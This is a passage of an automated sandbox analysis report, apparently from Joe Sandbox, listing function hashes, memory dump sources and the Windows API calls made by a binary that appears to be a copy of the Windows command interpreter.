                              • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                              • Instruction ID: 626f5a751669813aafbc07313dbe450b460fb27dca45836db7d80f6f7bd4554a
                              • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                              • Instruction Fuzzy Hash: 90414C21A1CA42D2EB20BF62E4812BAE3A0FB85751FC94135DE9E426DDDF3DD544A720
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A73
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A91
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AB0
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AE3
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16B01
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$iswdigit
                              • String ID: +-~!$<>+-*/%()|^&=,
                              • API String ID: 2770779731-632268628
                              • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                              • Instruction ID: effe43d12c9b242c3720abc3283af76f7e8fdc4af1f499ed7bcf7c80ff681041
                              • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                              • Instruction Fuzzy Hash: 6B31EC2260DA56C6E750BF12E490279B6F0FB45F85B898135DE5E43398EF3CE815A720
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11673
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1168D
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11757
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1176E
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11788
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1179C
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Size
                              • String ID:
                              • API String ID: 3586862581-0
                              • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                              • Instruction ID: 6b9ee04aab8ce0b254235bed3acaca53cdf8a9d7e3e82c3b704dad8e1ff7173e
                              • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                              • Instruction Fuzzy Hash: 23916F21A0DA46C1EB54BF16A580679B6B0FB48B95F9D8135DE4E033E9DF3CE845E320
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                              • String ID:
                              • API String ID: 1313749407-0
                              • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                              • Instruction ID: 7c5ccf3fa404b3ebb3a8cd3166f6ff99ea2509081dc24c35c25ba54863da6884
                              • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                              • Instruction Fuzzy Hash: DF51A321A0DA82C2EB54BF139594179E6A1FF49BA0FCC5130DD1E077D9DF3CE841A220
                              APIs
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction ID: ea862ab825ff82cdb19ccaddc6d8d5768ed13324faf621cabc5491e4c4ba097c
                              • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction Fuzzy Hash: 4A413665E0C616D6FB64BF13A5D8279B6A0AFA0755FCC9035CE8D021ECCF7CA485A630
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpfprintfwcsrchr
                              • String ID: CMD Internal Error %s$%s$Null environment
                              • API String ID: 3625580822-2781220306
                              • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction ID: 8db3748b5cf487d76d1862f64ddc651fee1ab6b566f55aa7c79ef14803870df8
                              • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction Fuzzy Hash: AC31AD21B0C646C2FB14BF43A5906BAB2A0FB45B94F885134CE1D17BE9EE3DE445D320
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23687
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236A6
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236EB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23703
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F23722
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Write_get_osfhandle$Mode
                              • String ID:
                              • API String ID: 1066134489-0
                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction ID: 03952be89b5e5851796d700cb64652f9ae7a22874f8080bf0615f3c3faab3b7b
                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction Fuzzy Hash: A15191A1B0C642C7EB24BF23948457AEAA5FB45B90F8C4435DE4A077D8DF3DE440AB21
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                              • String ID:
                              • API String ID: 3249344982-0
                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction ID: 578939e4242fb67fa47df001270a7bbdf748ec297657d080c39c07082e531b99
                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction Fuzzy Hash: FD411D7261CA42C7F310AF12A884769BAA4FB59B95F884235DE8907BD8CF3CD5549B10
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveErrorInformationLastTypeVolume
                              • String ID:
                              • API String ID: 850181435-0
                              • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction ID: a25159a1a3ac335a3f46242e936a41f15642525bb5f6a23aebf290d83171d45b
                              • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction Fuzzy Hash: E1415E3261CBC1CAE760AF22D8842E9B7A4FB89B44FC94525DE4D4BB98CF38D545D710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                              • String ID: KEYS$LIST$OFF
                              • API String ID: 411561164-4129271751
                              • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction ID: 234286788b9ec5b3d94f46992f5df923af23bde49a8f9ae562fe3542a5575cac
                              • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction Fuzzy Hash: 89214D20A1CA02C2FB54BF27A4C5175A6A1FB84750FC99631CE1E462EDDE7DE544A620
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10212
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10228
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F1023C
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10251
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction ID: 1dca9756e8f8f9b455c54d60a1b5b15015b9caac53f0f8f28fa142f89f77c4b2
                              • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction Fuzzy Hash: 2D21513190C682CBE7507F66A5C4238FAA0FF5A755F9C5134DE0E46AD8CE7CA848A720
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F13584
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction ID: 140e26a0a81a26be845006019222410ba0b7a0bba6d3e7769f1cf0147624425b
                              • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction Fuzzy Hash: 13114F31A0CA42C7EB50BF26A5C4478EAA0FB49B65F995334DD6F427D8CE3CD845A610
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction ID: c0aac1a5d9c9774d1e9bb96ac3a74788abd524ddc1d268ca31471514ad1a90e4
                              • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction Fuzzy Hash: 54114226A09B41CBEF00FF62E88416873A4F719758F840A34EE6D47B98DF3CD5648350
                              APIs
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F271F9
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F2720D
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F27300
                                • Part of subcall function 00007FF744F25740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF744F275C4,?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F25744
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: OpenSemaphore$CloseErrorHandleLast
                              • String ID: _p0$wil
                              • API String ID: 455305043-1814513734
                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction ID: 614ba4b4d610974da8b7c18f55219536cf8e185883ac7472873659df69b94f40
                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction Fuzzy Hash: 22617F62B1DA42C6EF25BF5694901B9A3E1FF84B80F985431DE0E077D8DE3EE9049720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspacememset$AllocProcess
                              • String ID: %s
                              • API String ID: 2401724867-3043279178
                              • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction ID: 3edd747d2199c897a522bd6553674ebe464d90abb40cf5eea045486bc718f3b2
                              • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction Fuzzy Hash: 9451B632A0C682C9EB20BF12D8812B9B3A0FB45B95F884135DE4D476D9EF3DE551E720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 3849470556-1994581435
                              • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction ID: 71ad371b7eaf1b042f937ec726f05ad92c86e8e437788caaa9165878371b26b0
                              • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction Fuzzy Hash: 67515721A0C652C5F724BF57A488279BAA0FB94B54F898035DE5D433D8DF7CE840A720
                              APIs
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F29A10
                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F29994
                                • Part of subcall function 00007FF744F2A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A77A
                                • Part of subcall function 00007FF744F2A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A839
                                • Part of subcall function 00007FF744F2A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A850
